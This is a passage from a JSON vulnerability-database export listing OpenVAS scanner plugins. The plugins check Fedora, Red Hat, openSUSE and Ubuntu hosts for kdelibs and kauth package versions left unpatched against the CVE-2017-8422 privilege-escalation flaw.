7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-18T00:00:00", "type": "openvas", "title": "Fedora Update for kdelibs FEDORA-2017-8b4898ce81", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872685", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872685", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kdelibs FEDORA-2017-8b4898ce81\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872685\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-18 06:59:10 +0200 (Thu, 18 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kdelibs FEDORA-2017-8b4898ce81\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kdelibs'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kdelibs on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-8b4898ce81\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U65IQ2CERPEVRVCMJGSPT2A3TMFYCDMI\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~4.14.30~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-23T00:00:00", "type": "openvas", "title": "RedHat Update for kdelibs RHSA-2017:1264-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871817", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871817", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kdelibs RHSA-2017:1264-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871817\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 07:02:41 +0200 (Tue, 23 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kdelibs RHSA-2017:1264-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kdelibs'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The K Desktop Environment (KDE) is a\ngraphical desktop environment for the X Window System. The kdelibs packages include\ncore libraries for the K Desktop Environment.\n\nSecurity Fix(es):\n\n * A privilege escalation flaw was found in the way kdelibs handled D-Bus\nmessages. A local user could potentially use this flaw to gain root\nprivileges by spoofing a callerID and leveraging a privileged helper\napplication. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this\nissue.\");\n script_tag(name:\"affected\", value:\"kdelibs on\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1264-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-May/msg00030.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~4.14.8~6.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-common\", rpm:\"kdelibs-common~4.14.8~6.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-debuginfo\", rpm:\"kdelibs-debuginfo~4.14.8~6.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-devel\", rpm:\"kdelibs-devel~4.14.8~6.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-ktexteditor\", rpm:\"kdelibs-ktexteditor~4.14.8~6.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T17:33:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kauth (openSUSE-SU-2017:1272-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851554", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851554", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851554\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 06:53:20 +0200 (Tue, 16 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kauth (openSUSE-SU-2017:1272-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kauth'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for kauth and kdelibs4 fixes the following issues:\n\n - CVE-2017-8422: logic flaw in the KAuth framework allowed privilege\n escalation (boo#1036244).\");\n\n script_tag(name:\"affected\", value:\"kauth, on openSUSE Leap 42.2, openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1272-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kauth-debugsource\", rpm:\"kauth-debugsource~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kauth-devel\", rpm:\"kauth-devel~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4\", rpm:\"kdelibs4~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-branding-upstream\", rpm:\"kdelibs4-branding-upstream~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-core\", rpm:\"kdelibs4-core~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-core-debuginfo\", rpm:\"kdelibs4-core-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-debuginfo\", rpm:\"kdelibs4-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-debugsource\", rpm:\"kdelibs4-debugsource~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-doc\", rpm:\"kdelibs4-doc~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-doc-debuginfo\", rpm:\"kdelibs4-doc-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5\", rpm:\"libKF5Auth5~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-debuginfo\", rpm:\"libKF5Auth5-debuginfo~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4\", rpm:\"libkde4~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-debuginfo\", rpm:\"libkde4-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-devel\", rpm:\"libkde4-devel~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4\", rpm:\"libkdecore4~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-debuginfo\", rpm:\"libkdecore4-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-devel\", rpm:\"libkdecore4-devel~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-devel-debuginfo\", rpm:\"libkdecore4-devel-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall-devel\", rpm:\"libksuseinstall-devel~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1\", rpm:\"libksuseinstall1~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1-debuginfo\", rpm:\"libksuseinstall1-debuginfo~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kauth-devel-32bit\", rpm:\"kauth-devel-32bit~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-32bit\", rpm:\"libKF5Auth5-32bit~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-debuginfo-32bit\", rpm:\"libKF5Auth5-debuginfo-32bit~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-32bit\", rpm:\"libkde4-32bit~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-debuginfo-32bit\", rpm:\"libkde4-debuginfo-32bit~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-32bit\", rpm:\"libkdecore4-32bit~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-debuginfo-32bit\", rpm:\"libkdecore4-debuginfo-32bit~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1-32bit\", rpm:\"libksuseinstall1-32bit~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1-debuginfo-32bit\", rpm:\"libksuseinstall1-debuginfo-32bit~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-apidocs\", rpm:\"kdelibs4-apidocs~4.14.25~7.4.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-lang\", rpm:\"libKF5Auth5-lang~5.26.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kauth-debugsource\", rpm:\"kauth-debugsource~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kauth-devel\", rpm:\"kauth-devel~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4\", rpm:\"kdelibs4~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-branding-upstream\", rpm:\"kdelibs4-branding-upstream~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-core\", rpm:\"kdelibs4-core~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-core-debuginfo\", rpm:\"kdelibs4-core-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-debuginfo\", rpm:\"kdelibs4-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-debugsource\", rpm:\"kdelibs4-debugsource~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-doc\", rpm:\"kdelibs4-doc~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-doc-debuginfo\", rpm:\"kdelibs4-doc-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5\", rpm:\"libKF5Auth5~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-debuginfo\", rpm:\"libKF5Auth5-debuginfo~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4\", rpm:\"libkde4~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-debuginfo\", rpm:\"libkde4-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-devel\", rpm:\"libkde4-devel~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4\", rpm:\"libkdecore4~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-debuginfo\", rpm:\"libkdecore4-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-devel\", rpm:\"libkdecore4-devel~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-devel-debuginfo\", rpm:\"libkdecore4-devel-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall-devel\", rpm:\"libksuseinstall-devel~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1\", rpm:\"libksuseinstall1~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1-debuginfo\", rpm:\"libksuseinstall1-debuginfo~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kdelibs4-apidocs\", rpm:\"kdelibs4-apidocs~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-lang\", rpm:\"libKF5Auth5-lang~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kauth-devel-32bit\", rpm:\"kauth-devel-32bit~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-32bit\", rpm:\"libKF5Auth5-32bit~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libKF5Auth5-debuginfo-32bit\", rpm:\"libKF5Auth5-debuginfo-32bit~5.21.0~16.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-32bit\", rpm:\"libkde4-32bit~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkde4-debuginfo-32bit\", rpm:\"libkde4-debuginfo-32bit~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-32bit\", rpm:\"libkdecore4-32bit~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libkdecore4-debuginfo-32bit\", rpm:\"libkdecore4-debuginfo-32bit~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1-32bit\", rpm:\"libksuseinstall1-32bit~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libksuseinstall1-debuginfo-32bit\", rpm:\"libksuseinstall1-debuginfo-32bit~4.14.18~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for kde4libs USN-3286-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for kde4libs USN-3286-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843162\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-15 17:55:28 +0200 (Mon, 15 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for kde4libs USN-3286-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kde4libs'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Sebastian Krahmer discovered that the\n KDE-Libs Kauth component incorrectly checked services invoking D-Bus. A local\n attacker could use this issue to gain root privileges.\");\n script_tag(name:\"affected\", value:\"kde4libs on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3286-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3286-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kdelibs5-plugins\", ver:\"4:4.13.3-0ubuntu0.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "openvas", "title": "Fedora Update for kf5-kauth FEDORA-2017-6bdbf57f29", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872680", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872680", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kf5-kauth FEDORA-2017-6bdbf57f29\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872680\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 07:01:01 +0200 (Tue, 16 May 2017)\");\n 